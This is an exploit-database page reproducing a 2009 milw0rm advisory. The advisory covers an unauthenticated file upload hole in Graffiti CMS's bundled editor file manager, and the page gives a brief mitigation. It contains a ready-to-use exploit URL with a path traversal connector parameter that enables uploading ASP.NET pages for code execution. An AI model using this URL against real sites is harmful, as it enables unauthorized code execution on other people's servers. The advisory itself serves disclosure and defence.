header-logo
Suggest Exploit
vendor:
Graffiti CMS
by:
milw0rm.com
7.5
CVSS
HIGH
Unauthenticated File Upload
434
CWE
Product Name: Graffiti CMS
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Graffiti CMS Unauthenticated File Upload Vulnerability

Graffiti CMS includes a file manager component that allows unauthenticated users to upload files (including asp.net pages which allow code execution). All versions are affected by this vulnerability. To exploit this issue, it only suffices to access to the following URL: http://DOMAIN_TLD/GRAFFITI_CMS_INSTALL_DIR/__utility/Telligent_Editor/editor/filemanager/browser/default/browser.html?connector=../../connectors/aspx/connector.aspx

Mitigation:

Ensure that the file manager component is not accessible to unauthenticated users.
Source

Exploit-DB raw data:

Graffiti CMS includes a file manager component that allows
unauthenticated users to upload files (including asp.net pages which
allow code execution). All versions are affected by this
vulnerability.

To exploit this issue, it only suffices to access to the following URL.

http://DOMAIN_TLD/GRAFFITI_CMS_INSTALL_DIR/__utility/Telligent_Editor/editor/filemanager/browser/default/browser.html?connector=../../connectors/aspx/connector.aspx

# milw0rm.com [2009-09-10]

Navigation

Suggest Exploit

Services By CQR